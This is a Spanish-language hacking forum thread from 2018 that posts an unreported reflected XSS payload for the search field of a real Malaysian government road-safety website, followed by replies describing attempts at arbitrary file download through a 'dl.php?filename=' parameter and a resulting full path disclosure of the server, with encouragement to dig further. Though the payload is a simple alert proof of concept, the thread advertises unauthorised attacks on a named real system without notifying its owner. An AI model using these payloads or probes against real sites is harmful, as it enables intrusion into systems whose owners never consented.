comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[XSS] Official Website of Malaysian Institute of Road Safety Research (MIROS)

  • 2 Respuestas
  • 711 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Drok3r

  • *
  • Underc0der
  • Mensajes: 47
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
    • RedBird
  • Twitter: @drok3r
« en: Julio 26, 2018, 10:52:33 pm »


  • URL: https://www.miros.gov.my
  • Vector: search
  • Payload: x'"><script>alert(/Drok3r/)</script>
  • Autor: Drok3r (redbirdTEAM, CiberSecurityRECON)
  • Reportado: NO

Desconectado Nobody

  • *
  • Underc0der
  • Mensajes: 197
  • Actividad:
    1.67%
  • Reputación 4
  • Security as art.
    • Ver Perfil
    • Nobody Test Laboratory
  • Twitter: @n0bodysec
« Respuesta #1 en: Agosto 09, 2018, 03:50:39 am »
¡Hola!

No indagué mucho, pero al principio parecía vulnerable a Arbitrary File Download, aunque no logro bypassear el filtro.
De todas formas, conseguí un FPD generando un error a la hora de utilizar el archivo "dl.php" provisto por ellos.
https://www.miros.gov.my/1/dl.php?filename=.
FPD: C:\xampp\htdocs\miros\1\dl.php

Saludos.

Desconectado Drok3r

  • *
  • Underc0der
  • Mensajes: 47
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
    • RedBird
  • Twitter: @drok3r
« Respuesta #2 en: Agosto 11, 2018, 08:46:56 pm »
¡Hola!

No indagué mucho, pero al principio parecía vulnerable a Arbitrary File Download, aunque no logro bypassear el filtro.
De todas formas, conseguí un FPD generando un error a la hora de utilizar el archivo "dl.php" provisto por ellos.
https://www.miros.gov.my/1/dl.php?filename=.
FPD: C:\xampp\htdocs\miros\1\dl.php

Saludos.

Hola...

Muy interesante... igual con un poco de tiempo de logra sacar algo

 

¿Te gustó el post? COMPARTILO!



XSS in MIT (Massachusetts Institute of Technology)

Iniciado por hdbreaker

Respuestas: 2
Vistas: 1413
Último mensaje Enero 23, 2013, 04:39:56 am
por hdbreaker